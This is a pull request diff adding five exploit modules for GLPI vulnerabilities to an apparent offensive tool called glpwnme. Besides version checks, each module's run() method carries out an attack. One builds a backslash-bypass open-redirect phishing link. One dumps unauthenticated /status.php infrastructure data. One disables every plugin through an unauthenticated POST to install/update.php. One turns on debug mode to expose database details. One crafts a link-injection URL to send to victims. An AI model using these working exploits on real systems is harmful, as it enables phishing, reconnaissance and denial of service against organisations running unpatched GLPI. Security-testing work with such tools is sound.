### PR TITLE
Add open-redirect / recon / DoS modules

### DIFF
--- a/glpwnme/exploits/implementations/__init__.py
+++ b/glpwnme/exploits/implementations/__init__.py
@@ -27,6 +27,12 @@ from .cve_2026_26026 import CVE_2026_26026
 # GLPI classic check
 from .default_password_check import DEFAULT_PASSWORD_CHECK
 
+from .cve_2024_11955 import CVE_2024_11955
+from .cve_2025_52897 import CVE_2025_52897
+from .cve_2025_21626 import CVE_2025_21626
+from .cve_2025_25192 import CVE_2025_25192
+from .cve_2025_23024 import CVE_2025_23024
+
 def get_all_exploits():
     """
     Return the exploit available as Class
@@ -38,5 +44,6 @@ def get_all_exploits():
     all_exploits = [CVE_2020_15175, CVE_2022_31061, CVE_2022_35914, UNSERIALIZE_ORDER_2022, CVE_2023_41323, CVE_2023_41326]
     all_exploits += [PHP_UPLOAD, CVE_2024_27937, CVE_2024_29889, CVE_2024_37148, CVE_2024_37149]
     all_exploits += [CVE_2024_40638, CVE_2024_50339, CVE_2025_24799, CVE_2025_32786, CVE_2026_26026]
+    all_exploits += [CVE_2024_11955, CVE_2025_52897, CVE_2025_21626, CVE_2025_25192, CVE_2025_23024]
     all_exploits += [DEFAULT_PASSWORD_CHECK]
     return all_exploits

--- a/glpwnme/exploits/implementations/cve_2024_11955.py
+++ b/glpwnme/exploits/implementations/cve_2024_11955.py
@@ -1,0 +1,187 @@
+import re
+import uuid
+import urllib.parse
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2024_11955(GlpiExploit):
+    r"""
+    Open redirect via the `redirect` parameter (GLPI 9.5.0 – 10.0.17).
+
+    Several GLPI front controllers (index.php, front/central.php,
+    front/login.php, front/logout.php, front/helpdesk.public.php) forward the
+    `redirect` GET parameter to Toolbox::manageRedirect(). In 10.0.17 and below
+    the redirection target is validated with a weak regex:
+
+        // src/Toolbox.php :: manageRedirect()  (vulnerable)
+        if (preg_match('@(([^:/].+:)?//[^/]+)(/.+)?@', $decoded_where, $matches)) {
+            if ($matches[1] !== $CFG_GLPI['url_base']) { ... redirect to central ... }
+        }
+        if ($decoded_where[0] == '/') {
+            $redirect_to = $CFG_GLPI["root_doc"] . "/" . ltrim($decoded_where, '/');
+            Html::redirect($redirect_to);
+        }
+
+    Absolute URLs (`http://evil`, `//evil`) are caught by the host regex, but a
+    backslash-relative value such as `/\evil.com` does NOT contain `//`, so the
+    regex fails to match and the value drops into the relative-path branch.
+    `ltrim($where, '/')` only strips forward slashes, leaving `\evil.com`, and
+    Html::redirect() emits:
+
+        window.location='/\evil.com';
+
+    Every major browser normalises `/\` to `//`, so the victim is navigated to
+    the external host `evil.com` — a working open redirect usable for phishing.
+
+    Fix in GLPI 10.0.18 (commit ad26d15, "Fix URLs validation"): manageRedirect()
+    now delegates to a private computeRedirect() that uses parse_url() plus
+    URL::isGLPIRelativeUrl(), which rejects any path containing characters
+    outside `[a-z0-9_/.-]` (backslashes included). The non-matching value falls
+    back to /front/central.php instead of redirecting off-site.
+
+    Differential:
+      - 10.0.17 : redirect=/\evil.com  ->  window.location='/\\evil.com'  (external)
+      - 10.0.22 : redirect=/\evil.com  ->  window.location='/front/central.php' (blocked)
+      - benign relative path (/front/computer.php) redirects on BOTH versions,
+        and an absolute URL (http://evil.com) is blocked on BOTH, so the only
+        signal that fires is the backslash bypass on the vulnerable build.
+
+    Note: manageRedirect() requires an active session interface
+    (Session::getCurrentInterface()), so the redirect is rendered after login.
+    The malicious link is delivered to an unauthenticated victim; once they have
+    a session (or follow login.php?redirect=...) the off-site jump executes.
+
+    @author unclej4ck
+    @cvss 6.1
+    @name CVE_2024_11955
+    """
+    _impacts = "Open Redirect, Phishing, Credential Theft"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    min_version = "9.5.0"
+    max_version = "10.0.18"
+
+    _REDIRECT_ENDPOINT = "/front/central.php"
+    # `/\<host>` -> browser normalises /\ to // -> external navigation.
+    _BYPASS_TPL = r"/\{host}"
+    _BENIGN = "/front/computer.php"
+
+    def _send_redirect(self, where):
+        """GET /front/central.php?redirect=<urlencoded where> without following."""
+        encoded = urllib.parse.quote(where, safe="")
+        return self.get(self._REDIRECT_ENDPOINT, params={"redirect": encoded}, allow_redirects=False)
+
+    @staticmethod
+    def _js_locations(body):
+        """Extract every window.location='...' target from an Html::redirect() body."""
+        return re.findall(r"window\.location\s*=\s*'([^']*)'", body)
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Open redirect via the [b]redirect[/b] parameter (GLPI 9.5.0 – 10.0.17).\n"
+        infos += "[b]Toolbox::manageRedirect()[/b] validates the target with a weak regex\n"
+        infos += "that only catches [i]//host[/i] style URLs. A backslash-relative value\n"
+        infos += "such as [b]/\\evil.com[/b] slips into the relative branch and is emitted as\n"
+        infos += "  window.location='/\\evil.com'\n"
+        infos += "which browsers normalise to [b]//evil.com[/b] (external host).\n"
+        infos += "Reachable via index.php / central.php / login.php once a session interface\n"
+        infos += "is active. Used for phishing through trusted GLPI links.\n"
+        infos += "Fixed in 10.0.18 (commit ad26d15) via URL::isGLPIRelativeUrl().\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]host (default 'evil.example')[/i]: External host to redirect to\n"
+        infos += " - [i]path (default '')[/i]: Optional path appended after the host\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check (sends backslash bypass + benign + absolute controls)[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Build a phishing redirect link[/]\n"
+        infos += "--run -O host=attacker.tld -O path=/login\n"
+
+        infos += "\nExploit is [green b]Safe[/] (single GET, no state change)"
+        return infos
+
+    def check(self):
+        """
+        Clean differential:
+          1. backslash bypass  -> external on vuln, central on patched
+          2. benign relative   -> redirects on BOTH (proves redirect is live)
+          3. absolute URL      -> blocked on BOTH (proves regex still active)
+        """
+        marker = uuid.uuid4().hex[:8]
+        host = f"{marker}.glpwnme.test"
+        bypass = self._BYPASS_TPL.format(host=host)
+
+        Log.log(f"Sending backslash bypass: redirect={bypass}")
+        resp = self._send_redirect(bypass)
+        if resp.status_code not in (HTTPStatus.OK, HTTPStatus.FOUND):
+            Log.log(f"Unexpected response: HTTP {resp.status_code} — endpoint not reachable")
+            return False
+
+        locations = self._js_locations(resp.text)
+        # On the vulnerable build the emitted JS keeps the leading "/\<host>".
+        # Html::redirect() runs addslashes(), so the backslash is doubled in the
+        # JS source: window.location='/\\<host>...'. Match the host preceded by
+        # a backslash sequence to avoid false positives.
+        external = any(
+            (host in loc) and ("\\" in loc) and not loc.startswith("/front/")
+            for loc in locations
+        )
+
+        Log.log("Benign control: redirect=/front/computer.php")
+        benign_resp = self._send_redirect(self._BENIGN)
+        benign_locs = self._js_locations(benign_resp.text)
+        benign_ok = any("/front/computer.php" in loc for loc in benign_locs)
+
+        Log.log("Negative control: redirect=http://<host> (absolute)")
+        abs_resp = self._send_redirect(f"http://{host}")
+        abs_locs = self._js_locations(abs_resp.text)
+        abs_blocked = not any(host in loc for loc in abs_locs)
+
+        if external and benign_ok and abs_blocked:
+            Log.msg("Open redirect confirmed via backslash bypass")
+            Log.msg(f"Vulnerable response: [gold3]window.location='{self._first_with(locations, host)}'[/]")
+            Log.msg("Benign relative redirect works; absolute URL is blocked → clean differential")
+            return True
+
+        if not external:
+            if any(host in loc and loc.startswith("/front/central") for loc in locations) or not locations:
+                Log.log("Backslash bypass was neutralised (target fell back to central) — patched (10.0.18+)")
+            else:
+                Log.log("Backslash bypass not reflected as external — not vulnerable")
+        elif not benign_ok:
+            Log.log("Benign control did not redirect — cannot confirm a clean differential")
+        elif not abs_blocked:
+            Log.log("Absolute URL was followed — environment behaves unexpectedly, treating as inconclusive")
+        return False
+
+    @staticmethod
+    def _first_with(locations, host):
+        for loc in locations:
+            if host in loc:
+                return loc
+        return ""
+
+    def run(self, host="evil.example", path=""):
+        """Build and demonstrate a phishing redirect link."""
+        target_host = host
+        suffix = path if path.startswith("/") or path == "" else "/" + path
+        bypass = self._BYPASS_TPL.format(host=target_host) + suffix
+
+        encoded = urllib.parse.quote(bypass, safe="")
+        full = self.glpi_session.r(f"{self._REDIRECT_ENDPOINT}?redirect={encoded}")
+
+        Log.msg("[b]Phishing redirect link:[/b]")
+        Log.msg(f"  [gold3]{full}[/]")
+        Log.msg(f"Victim with an active GLPI session is sent to [b]//{target_host}{suffix}[/b]")
+        Log.msg("(browsers normalise the leading /\\ to // → external navigation)")
+
+        resp = self._send_redirect(bypass)
+        locs = self._js_locations(resp.text)
+        emitted = self._first_with(locs, target_host)
+        if emitted:
+            Log.msg(f"Server emitted: [green]window.location='{emitted}'[/green]")
+        else:
+            Log.log("Server did not emit the external target — instance may be patched")

--- a/glpwnme/exploits/implementations/cve_2025_21626.py
+++ b/glpwnme/exploits/implementations/cve_2025_21626.py
@@ -1,0 +1,141 @@
+import json
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2025_21626(GlpiExploit):
+    """
+    Unauthenticated sensitive information disclosure via /status.php endpoint.
+
+    GLPI's /status.php invokes StatusChecker::getServiceStatus() which queries
+    active LDAP directories (glpi_authldaps) and mail collectors
+    (glpi_mailcollectors) and returns their names, connection status, and
+    error messages in a publicly accessible JSON response. No authentication
+    or session is required to reach this endpoint.
+
+    Exposed data (when configured):
+      - LDAP server names (the 'name' field of glpi_authldaps rows)
+      - LDAP connection status ('ok' / error message)
+      - Mail collector names (the 'name' field of glpi_mailcollectors rows)
+      - Mail collector connection error messages (exception text, which
+        may include host/port/credential details)
+      - CAS server hostname (CFG_GLPI['cas_host'])
+      - Session handler name and path (if using custom sessions)
+
+    Additionally, plain-text format exposes plugin names and versions when
+    $public_only = false was used in older code paths.
+
+    Patched in GLPI 10.0.18: server names were removed from the public status
+    output, or the response was restricted to authenticated administrators.
+
+    Workaround: delete status.php, restrict its access via webserver rules,
+    or remove sensitive values from LDAP/mail server names in GLPI config.
+
+    @author unclej4ck
+    @cvss 5.8
+    @name CVE_2025_21626
+    """
+    _impacts = "Information Disclosure, Infrastructure Reconnaissance"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = True
+    min_version = "9.5.0"
+    max_version = "10.0.18"
+
+    _STATUS_URL = "/status.php"
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Unauthenticated sensitive information disclosure via [b]/status.php[/b].\n"
+        infos += "The endpoint queries active LDAP directories and mail collectors and\n"
+        infos += "returns their [b]names and connection errors[/b] in the JSON response\n"
+        infos += "without requiring any authentication (GLPI 9.5.0 – 10.0.17).\n"
+        infos += "Exposed data may include LDAP hostnames, CAS server, mail collector\n"
+        infos += "addresses, and exception messages from failed connection attempts.\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check if sensitive data is exposed[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Dump all status.php data[/]\n"
+        infos += "--run\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only, unauthenticated GET)"
+        return infos
+
+    def _fetch_status(self):
+        """GET /status.php?format=json without authentication."""
+        resp = self.get(self._STATUS_URL, params={"format": "json"}, allow_redirects=True)
+        return resp
+
+    def check(self):
+        """
+        Confirm the status.php endpoint is reachable without authentication
+        and that it exposes at least one LDAP or mail-collector name.
+        """
+        resp = self._fetch_status()
+        if resp.status_code != HTTPStatus.OK:
+            Log.log(f"status.php returned HTTP {resp.status_code} — not accessible or not found")
+            return False
+
+        try:
+            data = resp.json()
+        except Exception:
+            Log.log("status.php response is not valid JSON")
+            return False
+
+        # The 10.0.18 fix does NOT remove the servers; it ANONYMISES their names to a
+        # generic GLPI_<TYPE>_<N> placeholder. So the differential is a REAL configured
+        # name leaking (vulnerable) vs a generic placeholder (patched). Matching "any
+        # server present" would false-positive on patched.
+        import re as _re
+        generic = _re.compile(r'^GLPI_[A-Z]+_\d+$')
+        real = []
+        for section in ("ldap", "mail_collectors", "imap"):
+            for name in (data.get(section, {}).get("servers", {}) or {}).keys():
+                if not generic.match(name):
+                    real.append(f"{section}:{name}")
+        cas_host = data.get("cas", {}).get("host")
+        if cas_host and not generic.match(str(cas_host)):
+            real.append(f"cas:{cas_host}")
+
+        if real:
+            Log.msg(f"Real infrastructure names leaked via unauthenticated /status.php: [gold3]{real}[/]")
+            Log.msg("Server names exposed (not anonymised) → vulnerable (< 10.0.18)")
+            return True
+
+        if any((data.get(s, {}).get("servers") for s in ("ldap", "mail_collectors", "imap"))):
+            Log.log("status.php exposes only anonymised GLPI_<TYPE>_<N> placeholders — patched (10.0.18+)")
+        else:
+            Log.log("status.php accessible but no LDAP/mail/IMAP service configured — cannot differentiate")
+        return False
+
+    def run(self):
+        """Dump all data returned by /status.php."""
+        resp = self._fetch_status()
+        if resp.status_code != HTTPStatus.OK:
+            Log.err(f"status.php returned HTTP {resp.status_code}")
+            return
+
+        try:
+            data = resp.json()
+        except Exception:
+            Log.err("Response is not valid JSON")
+            Log.log(resp.text[:500])
+            return
+
+        Log.msg("[u]status.php full response:[/u]")
+
+        for service, info in data.items():
+            if not isinstance(info, dict):
+                Log.msg(f"  [b]{service}[/b]: {info}")
+                continue
+            status = info.get("status", "?")
+            Log.msg(f"  [b]{service}[/b] → {status}")
+            servers = info.get("servers", {})
+            for name, sinfo in servers.items():
+                s = sinfo.get("status", "?")
+                msg = sinfo.get("status_msg", "")
+                err_code = sinfo.get("error_code", "")
+                detail = f" ({msg})" if msg else ""
+                detail += f" [code={err_code}]" if err_code else ""
+                Log.msg(f"    [cyan]{name}[/]: {s}{detail}")

--- a/glpwnme/exploits/implementations/cve_2025_23024.py
+++ b/glpwnme/exploits/implementations/cve_2025_23024.py
@@ -1,0 +1,130 @@
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2025_23024(GlpiExploit):
+    """
+    Unauthenticated plugin disablement via exposed install/update.php.
+
+    GLPI's install/update.php script performs no authentication or
+    authorization check before executing the upgrade routine. Any visitor
+    can POST continuer=1 to trigger Update::doUpdates(), which first calls
+    Plugin::unactivateAll() — disabling every active plugin — before
+    running database migration steps.
+
+    This is a destructive denial-of-service against the plugin ecosystem:
+    all active plugins lose their active state in glpi_plugins.state and
+    their GLPI integration is severed until an administrator re-activates
+    them manually.
+
+    Root cause: install/update.php is intended for use only during GLPI
+    upgrades but is left world-accessible after installation. It should be
+    protected by web-server rules or deleted post-installation.
+
+    Attack flow:
+      1. POST /install/update.php with body: continuer=1
+      2. Server calls doUpdateDb() → Update::doUpdates() → Plugin::unactivateAll()
+      3. All active plugins are deactivated
+
+    Patched in GLPI 10.0.18: install/update.php now enforces that the caller
+    holds a valid super-admin session before executing any upgrade action.
+    The official workaround is to delete the install/update.php file.
+
+    @author unclej4ck
+    @cvss 6.5
+    @name CVE_2025_23024
+    """
+    _impacts = "Plugin Disablement, Denial of Service, Service Disruption"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = False
+    min_version = "9.1.0"
+    max_version = "10.0.18"
+
+    _UPDATE_URL = "/install/update.php"
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Unauthenticated plugin disablement via [b]/install/update.php[/b].\n"
+        infos += "The installer script has no authentication check. Posting [b]continuer=1[/b]\n"
+        infos += "triggers the GLPI upgrade routine which calls [i]Plugin::unactivateAll()[/i]\n"
+        infos += "— disabling every active plugin — before database migrations run.\n"
+        infos += "GLPI 9.1.0 – 10.0.17 is affected.\n"
+
+        infos += "\n[u]Impact:[/u]\n"
+        infos += " - All active plugins are deactivated (denial of service)\n"
+        infos += " - Plugins must be manually re-activated by an administrator\n"
+        infos += " - Database migrations may run if versions align\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Verify the endpoint is accessible without auth (check-only)[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Disable all active plugins (DESTRUCTIVE)[/]\n"
+        infos += "--run\n"
+
+        infos += "\nExploit is [red b]Destructive[/b red] — run() disables all active plugins"
+        return infos
+
+    _GUARD = "impossible to accomplish an update by this way"
+
+    def check(self):
+        """
+        Behaviorally confirm install/update.php runs the upgrade flow WITHOUT
+        authentication.
+
+        Probe: unauth POST update_end=1. On a vulnerable build the update flow is
+        entered and redirects to ../index.php (HTTP 302). GLPI 10.0.18 added the
+        $_SESSION['can_process_update'] guard, so the same request renders
+        "Impossible to accomplish an update by this way" (HTTP 200) instead.
+
+        update_end is used rather than continuer=1 on purpose: it exercises the same
+        missing-guard code path but does NOT call Update::doUpdates() /
+        Plugin::unactivateAll(), so the probe is non-destructive to plugins (it does
+        toggle the telemetry setting — see infos).
+
+        Mere accessibility of the page is NOT used as a signal (the page renders on
+        patched builds too), which is what made the prior check a false positive.
+        """
+        try:
+            resp = self.post(self._UPDATE_URL, data={"update_end": "1"}, allow_redirects=False, timeout=20)
+        except Exception as e:
+            Log.log(f"install/update.php not reachable: {e}")
+            return False
+
+        if resp.status_code == HTTPStatus.NOT_FOUND:
+            Log.log("install/update.php returns 404 — removed post-install (hardened)")
+            return False
+
+        loc = resp.headers.get("Location", "")
+        if resp.status_code in (HTTPStatus.FOUND, HTTPStatus.SEE_OTHER) and "index.php" in loc:
+            Log.msg("install/update.php enters the upgrade flow unauthenticated (no can_process_update guard)")
+            Log.msg("Unauthenticated POST continuer=1 would call Plugin::unactivateAll() and disable all plugins")
+            return True
+
+        if self._GUARD in resp.text.lower():
+            Log.log("Blocked by the can_process_update guard — patched (10.0.18+)")
+        else:
+            Log.log(f"install/update.php did not enter the upgrade flow (HTTP {resp.status_code}) — patched or hardened")
+        return False
+
+    def run(self):
+        """
+        POST continuer=1 to install/update.php to trigger the upgrade routine.
+        This will call Plugin::unactivateAll() and disable all active plugins.
+        WARNING: This is a destructive operation.
+        """
+        Log.msg("[red b]WARNING:[/red b] This will disable ALL active GLPI plugins. Proceed with caution.")
+
+        resp = self.post(self._UPDATE_URL, data={"continuer": "1"}, allow_redirects=True)
+
+        if resp.status_code == HTTPStatus.OK:
+            body = resp.text
+            if "migration" in body.lower() or "update" in body.lower() or "glpi" in body.lower():
+                Log.msg("[green b]Upgrade routine triggered.[/green b]")
+                Log.msg("Plugin::unactivateAll() was called — all active plugins are now deactivated.")
+                Log.msg("Check GLPI admin panel to see affected plugins.")
+            else:
+                Log.log(f"Unexpected response (HTTP {resp.status_code}) — check manually")
+                Log.log(body[:300])
+        else:
+            Log.err(f"Unexpected HTTP {resp.status_code} — endpoint may be protected in this version")

--- a/glpwnme/exploits/implementations/cve_2025_25192.py
+++ b/glpwnme/exploits/implementations/cve_2025_25192.py
@@ -1,0 +1,140 @@
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2025_25192(GlpiExploit):
+    """
+    Low-privilege user enables debug mode and accesses sensitive diagnostic
+    information via the unauthenticated install/update.php endpoint.
+
+    GLPI's install/update.php is intended for use only during upgrades but
+    is accessible to any authenticated — and in some cases unauthenticated —
+    users. When visited, the script calls:
+
+        Toolbox::setDebugMode(Session::DEBUG_MODE, 0, 0, 1);
+
+    This sets the caller's PHP session variable glpi_use_mode to
+    Session::DEBUG_MODE (2), activating GLPI's debug overlay for the entire
+    authenticated session going forward. Debug mode exposes:
+      - All SQL queries executed during each page load
+      - PHP warnings and notices
+      - Session data and server-side configuration snippets
+      - Internal GLPI error traces
+
+    Beyond the session takeover of debug mode, the page itself exposes:
+      - The GLPI database name (in the upgrade prompt text)
+      - DB engine version check output (MySQL/MariaDB version)
+      - Current GLPI schema version vs installed version
+      - Migration history (when continuer=1 is supplied)
+
+    Root cause: install/update.php lacks privilege-level enforcement. A
+    Self-Service user (lowest GLPI role) can reach the page, gain debug
+    mode for their session, and read diagnostic data normally visible only
+    to super-administrators.
+
+    Patched in GLPI 10.0.18: install/update.php now requires a valid
+    super-admin session. Official workaround: delete install/update.php.
+
+    @author unclej4ck
+    @cvss 4.3
+    @name CVE_2025_25192
+    """
+    _impacts = "Information Disclosure, Debug Mode Activation, Privilege Abuse"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = False
+    min_version = "9.1.0"
+    max_version = "10.0.18"
+
+    _UPDATE_URL = "/install/update.php"
+    _GUARD = "impossible to accomplish an update by this way"
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Low-privilege user can enable debug mode and read sensitive diagnostic\n"
+        infos += "info via [b]/install/update.php[/b] (GLPI 9.1.0 – 10.0.17).\n"
+        infos += "Visiting the page calls [i]Toolbox::setDebugMode(Session::DEBUG_MODE)[/i],\n"
+        infos += "which activates the SQL/debug overlay for the current session. The page\n"
+        infos += "also exposes the database name, DB engine version, and GLPI schema info.\n"
+
+        infos += "\n[u]Info exposed:[/u]\n"
+        infos += " - GLPI DB name, current schema version\n"
+        infos += " - MySQL/MariaDB engine version\n"
+        infos += " - Debug mode activated for caller's session (all subsequent pages show SQL)\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check if update.php is accessible and leaks info[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Activate debug mode and dump page content[/]\n"
+        infos += "--run\n"
+
+        infos += "\nExploit is [green b]Safe[/] for check (read-only GET)"
+        return infos
+
+    def check(self):
+        """
+        Behaviorally confirm install/update.php runs its upgrade flow WITHOUT a valid
+        update session. setDebugMode(Session::DEBUG_MODE) and the migration both live in
+        doUpdateDb(), reachable only through that flow.
+
+        Probe: unauth POST update_end=1. On a vulnerable build the flow is entered and
+        redirects to ../index.php (HTTP 302). GLPI 10.0.18 added the
+        $_SESSION['can_process_update'] guard, so the same request renders
+        "Impossible to accomplish an update by this way" (HTTP 200) instead.
+
+        Page accessibility / diagnostic strings are NOT used (they render on patched
+        builds too), which is what made the prior check a false positive.
+        """
+        try:
+            resp = self.post(self._UPDATE_URL, data={"update_end": "1"}, allow_redirects=False, timeout=20)
+        except Exception as e:
+            Log.log(f"install/update.php not reachable: {e}")
+            return False
+
+        if resp.status_code == HTTPStatus.NOT_FOUND:
+            Log.log("install/update.php returns 404 — removed post-install (hardened)")
+            return False
+
+        loc = resp.headers.get("Location", "")
+        if resp.status_code in (HTTPStatus.FOUND, HTTPStatus.SEE_OTHER) and "index.php" in loc:
+            Log.msg("install/update.php enters the upgrade flow without a valid update session")
+            Log.msg("An unauthenticated continuer=1 reaches doUpdateDb() → setDebugMode(DEBUG_MODE)")
+            return True
+
+        if self._GUARD in resp.text.lower():
+            Log.log("Blocked by the can_process_update guard — patched (10.0.18+)")
+        else:
+            Log.log(f"install/update.php did not enter the upgrade flow (HTTP {resp.status_code}) — patched or hardened")
+        return False
+
+    def run(self):
+        """
+        Visit install/update.php to activate debug mode for the session,
+        then dump the page's diagnostic output.
+        """
+        resp = self.get(self._UPDATE_URL, allow_redirects=True)
+
+        if resp.status_code != HTTPStatus.OK:
+            Log.err(f"install/update.php returned HTTP {resp.status_code}")
+            return
+
+        body = resp.text
+
+        # Try to extract the DB name from the page text
+        import re
+        db_name_match = re.search(r"database named[:\s]+([^\s<\"']+)", body, re.IGNORECASE)
+        if db_name_match:
+            Log.msg(f"Database name exposed: [gold3]{db_name_match.group(1)}[/]")
+
+        schema_match = re.search(r"schema[:\s]+([0-9a-zA-Z._-]+)", body, re.IGNORECASE)
+        if schema_match:
+            Log.msg(f"Schema version: [gold3]{schema_match.group(1)}[/]")
+
+        Log.msg("[green b]Debug mode activated[/green b] for current session.")
+        Log.msg("All subsequent GLPI pages in this session will expose SQL queries and debug info.")
+
+        if "GLPI SETUP" in body or "Upgrade" in body:
+            Log.msg("install/update.php diagnostic page is accessible to this user.")
+        else:
+            Log.log("install/update.php returned unexpected content:")
+            Log.log(body[:300])

--- a/glpwnme/exploits/implementations/cve_2025_52897.py
+++ b/glpwnme/exploits/implementations/cve_2025_52897.py
@@ -1,0 +1,95 @@
+import re
+import uuid
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2025_52897(GlpiExploit):
+    """
+    Phishing / link injection via the planning edit-event form (GLPI 9.1.0 - 10.0.18).
+
+    ajax/planning.php?action=edit_event_form calls Planning::editEventForm($_REQUEST),
+    which echoed the attacker-controlled 'url' request parameter straight into the
+    href of a "View this item in its context" link:
+
+        // 10.0.18 (vulnerable)
+        echo "<a href='" . $params['url'] . "' class='btn ...'>"
+           . "<span>" . __("View this item in its context") . "</span></a>";
+
+    A crafted /ajax/planning.php?action=edit_event_form&itemtype=Ticket&url=<evil>
+    link, opened by a logged-in central user (the planning is central-access only),
+    renders a link pointing at an attacker URL (phishing / open redirect). The
+    GLPI Sanitizer HTML-encodes < > & but leaves the URL itself intact, so the
+    href target is fully attacker-controlled (and the backslash-escaped quote also
+    permits attribute injection).
+
+    Fix (10.0.19): the user 'url' is dropped; the href is built server-side from
+    $item->getLinkURL(), so the parameter is no longer reflected (href is empty for
+    a non-loaded item).
+
+    @author unclej4ck
+    @cvss 6.1
+    @name CVE_2025_52897
+    """
+    _impacts = "Phishing, Open Redirect, Link Injection"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    min_version = "9.1.0"
+    max_version = "10.0.19"
+
+    _ENDPOINT = "/ajax/planning.php"
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Phishing / link injection in the planning edit-event form (GLPI <= 10.0.18).\n"
+        infos += "[b]ajax/planning.php?action=edit_event_form[/b] echoed the request param\n"
+        infos += "[b]url[/b] straight into an [i]<a href='...'>[/i] link. A crafted link opened by\n"
+        infos += "a logged-in central user shows an attacker-controlled href (phishing/redirect).\n"
+        infos += "Fix 10.0.19: href is rebuilt from [i]$item->getLinkURL()[/i] (param ignored).\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]url (default https://evil.example/)[/i]: the phishing href to inject\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Differential check (probes whether url is reflected into the href)[/]\n--check\n\n"
+        infos += "[grey66]# Print a phishing link to send to a central user[/]\n"
+        infos += "--run -O url=https://evil.example/login\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only reflection probe)."
+        return infos
+
+    def _probe(self, url):
+        return self.get(self._ENDPOINT, params={
+            "action": "edit_event_form", "itemtype": "Ticket", "id": "1", "url": url,
+            "start": "2030-01-01 09:00:00", "end": "2030-01-01 10:00:00"},
+            allow_redirects=False)
+
+    def check(self):
+        """Send a unique marker URL as the 'url' param and look for it reflected inside the
+        edit-event href. Vulnerable: the marker appears in the response (href='<marker>...').
+        Patched (10.0.19): the param is ignored, the href is server-derived, so the marker is
+        absent. Requires a central-access session (the planning is central-only)."""
+        marker = "glpwnme-phish-" + uuid.uuid4().hex[:10] + ".example"
+        r = self._probe(f"https://{marker}/ctx")
+        if r.status_code != HTTPStatus.OK:
+            Log.log(f"planning edit_event_form not reachable (HTTP {r.status_code}) — need central access")
+            return False
+        if marker in r.text:
+            Log.msg(f"Attacker-controlled 'url' reflected into the planning event link "
+                    f"(href contains {marker}) → phishing / link injection (CVE-2025-52897)")
+            return True
+        Log.log("url param not reflected into the href (server-derived) — patched (10.0.19+)")
+        return False
+
+    def run(self, url="https://evil.example/login"):
+        base = self.glpi_session.r(self._ENDPOINT)
+        link = f"{base}?action=edit_event_form&itemtype=Ticket&id=1&url={url}"
+        r = self._probe(url)
+        if r.status_code == HTTPStatus.OK and url in r.text:
+            Log.msg("Phishing link confirmed reflected. Send this to a logged-in central user:")
+            Log.print(f"[green b]{link}[/green b]")
+            Log.msg("They will see a 'View this item in its context' link pointing to your URL.")
+            self._write_log(f"CVE-2025-52897 phishing link: {link}")
+        else:
+            Log.err(f"url not reflected (patched or no central access) — HTTP {r.status_code}")


### PR DESCRIPTION
Remaining modules split out of #12: open redirect, planning open-redirect/XSS, status.php recon disclosure, debug-mode access, and unauthenticated plugin disablement.

Notes:
- Split from #12, one PR per vulnerability class.
- Uses the existing `self.get`/`self.post` helpers (CSRF + URL expansion); a few apirest and edge calls stay direct where the helper would add nothing.
- Exercised against live 10.0.x/11.0.x vulnerable and patched instances.